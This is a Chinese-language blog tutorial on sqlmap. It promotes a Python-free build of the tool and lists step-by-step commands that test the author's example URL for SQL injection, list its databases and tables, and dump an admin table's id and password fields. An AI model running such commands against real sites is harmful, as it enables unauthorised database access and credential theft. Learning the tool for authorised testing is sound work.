SQLmap注入神器 怎么用?

前言:什么是sqlmap?


首先,SQLmap是一个开源渗透测试工具,可以检测和利用SQL注入漏洞来接管数据库服务器。它配备了强大的检测引擎,为渗透测试人员提供了许多猥琐的功能。它可以拖动库,访问底层文件系统,并通过带外连接在操作系统上执行命令。重点这是免费的!

但是sql需要安装python的环境,有的小白却很苦恼,不会啊,这里蓝域安全小编给大家分享的是 免安装python环境的 SQLmap!

蓝域sqlmap注入工具
本站长 测试了自己的( http://www.yemogege.cn/cxym-wlxg/5.html)
感觉就是一个神器,妈妈再也不用担心 自己不会配环境了
但是软件安装了 不会用咋办?不慌看下来 由小编为您细细讲解!(以下网址仅仅提供示范!)

使用说明:

1.检查注入点
sqlmap -u http://www.yemogege.cn/cxym-wlxg/5.html    

2.爆所有数据库信息
sqlmap -u http://www.yemogege.cn/cxym-wlxg/5.html --dbs

3.爆当前数据库信息
sqlmap -u http://www.yemogege.cn/cxym-wlxg/5.html --current-db


4.指定库名列出所有表
sqlmap -u http://www.yemogege.cn/cxym-wlxg/5.html -D vhost48330 --tables
'vhost48330' 为指定数据库名称
 
5.指定库名表名列出所有字段
sqlmap -u http://www.yemogege.cn/cxym-wlxg/5.html -D vhost48330 -T admin --columns
'admin' 为指定表名称
 
6.指定库名表名字段dump出指定字段
sqlmap -u http://www.yemogege.cn/cxym-wlxg/5.html -D vhost48330 -T admin -C ac,id,password --dump
'ac,id,password' 为指定字段名称


以上就是简单关于sqlmap,相关注入,如果喜欢请记得多多转发哦!

SQLmap点我安全无毒下载
 
作者:夜陌哥哥
来源:蓝域安全网(转载请注明出处哦)

  
 

版权保护: 本文由admin所发布,转载请保留本文链接: http://www.yemogege.cn/wzaq-stgz/52.html

免责声明:蓝域安全网所发布的一切渗透技术视频文章,逆向脱壳病毒分析教程,以及相关实用源码仅限用于学习和研究目的
请勿用于商业用途。如有侵权、不妥之处,请联系站长并出示版权证明以便删除! 

侵权删帖/违法举报/投稿等事物联系邮箱:yemogege@vip.qq.com 网站地图